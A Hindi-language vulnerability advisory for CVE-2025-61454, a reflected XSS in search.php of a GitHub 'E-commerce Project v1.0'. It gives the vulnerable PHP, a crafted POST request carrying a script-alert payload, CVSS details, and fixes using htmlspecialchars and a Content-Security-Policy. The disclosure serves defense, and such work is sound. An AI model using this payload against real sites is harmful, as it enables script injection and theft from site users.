
CVE-2025-61454 के लिए सार्वजनिक प्रकटीकरण और प्रूफ-ऑफ-कॉन्सेप्ट, जो E-commerce Project v1.0 के search.php में एक reflected XSS भेद्यता है, जिसमें शोषण के चरण और उपचार मार्गदर्शन शामिल हैं।
प्रकटीकरण तिथि: 14 अक्टूबर 2025
CVE ID: CVE-2025-61454
गंभीरता: मध्यम (CVSS 6.1)
E-commerce Project v1.0 में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है, विशेष रूप से search.php एंडपॉइंट के भीतर। search पैरामीटर में अनसैनिटाइज़्ड इनपुट सीधे प्रतिक्रिया HTML में वापस परावर्तित होता है, जिससे हमलावर उस उपयोगकर्ता के ब्राउज़र में मनमाना JavaScript निष्पादित कर सकते हैं जो किसी दुर्भावनापूर्ण लिंक पर जाता है या एक क्राफ्टेड अनुरोध सबमिट करता है।
इस मुद्दे को पहचानकर्ता CVE-2025-61454 सौंपा गया है। प्रकटीकरण के समय, विक्रेता द्वारा कोई पैच जारी नहीं किया गया है।
search.phphttp://localhost/e-commerce-main/search.phpसर्वर प्रतिक्रिया HTML में परावर्तित करने से पहले POST डेटा से search पैरामीटर को ठीक से सैनिटाइज़ करने में विफल रहता है। यह हमलावरों को JavaScript पेलोड इंजेक्ट करने की अनुमति देता है, जिससे क्लाइंट-साइड कोड निष्पादन होता है।
एक हमलावर एम्बेडेड स्क्रिप्ट-जैसी सामग्री वाला इनपुट तैयार करता है और इसे संवेदनशील POST एंडपॉइंट पर भेजता है। चूंकि सर्वर उचित HTML/विशेषता/JS एन्कोडिंग लागू किए बिना इनपुट को HTML प्रतिक्रिया में परावर्तित करता है, ब्राउज़र परावर्तित सामग्री को निष्पादन योग्य मार्कअप के रूप में मानता है और उसे चलाता है। यह एक रिफ्लेक्टेड (गैर-स्थायी) XSS परिदृश्य है; हमलावर को पीड़ित को अनुरोध करने या विशेष रूप से निर्मित लिंक/फ़ॉर्म पर जाने के लिए राजी करना होगा।
$search = $_POST['search'];
echo "<div>Search results for: $search</div>";
| CWE ID | शीर्षक |
|---|---|
| CWE-79 | वेब पेज जनरेशन के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन ('क्रॉस-साइट स्क्रिप्टिंग') |
| स्कोर | गंभीरता | वेक्टर स्ट्रिंग |
|---|---|---|
| 6.1 | मध्यम | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
सफल शोषण के परिणामस्वरूप निम्न हो सकते हैं:
git clone https://github.com/Bhabishya-123/E-commerce.git
प्रोजेक्ट को तैनात करने और एप्लिकेशन तक पहुंचने के लिए XAMPP/LAMP का उपयोग करें।
POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded
search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
search=yxo9p<script>alert(1)</script>xnzmd&submit=
yxo9p<script>alert(1)</script>xnzmd
स्पष्टीकरण:
पेलोड <script>alert(1)</script> खोज पैरामीटर के भीतर एम्बेडेड है। जब कोई पीड़ित इस दुर्भावनापूर्ण पेलोड के साथ खोज फ़ॉर्म सबमिट करता है (या सोशल इंजीनियरिंग के माध्यम से ऐसा करने के लिए धोखा दिया जाता है), तो JavaScript उनके ब्राउज़र संदर्भ में निष्पादित होता है।
यदि संवेदनशील है, तो ब्राउज़र JavaScript कोड निष्पादित करेगा, जिसमें मान 1 के साथ एक अलर्ट बॉक्स प्रदर्शित होगा। यह सफल XSS शोषण की पुष्टि करता है।
htmlspecialchars() या समकक्ष का उपयोग करें।$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
| घटना | तिथि |
|---|---|
| भेद्यता की खोज | 16 सितंबर 2025 |
| सार्वजनिक प्रकटीकरण | 13 अक्टूबर 2025 |
| पैच उपलब्ध | ❌ प्रकटीकरण के अनुसार उपलब्ध नहीं |
यह भेद्यता निम्न द्वारा खोजी और प्रकट की गई थी:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 यह सलाह आधिकारिक विक्रेता पैच की अनुपस्थिति के कारण स्वतंत्र रूप से प्रकाशित की गई है।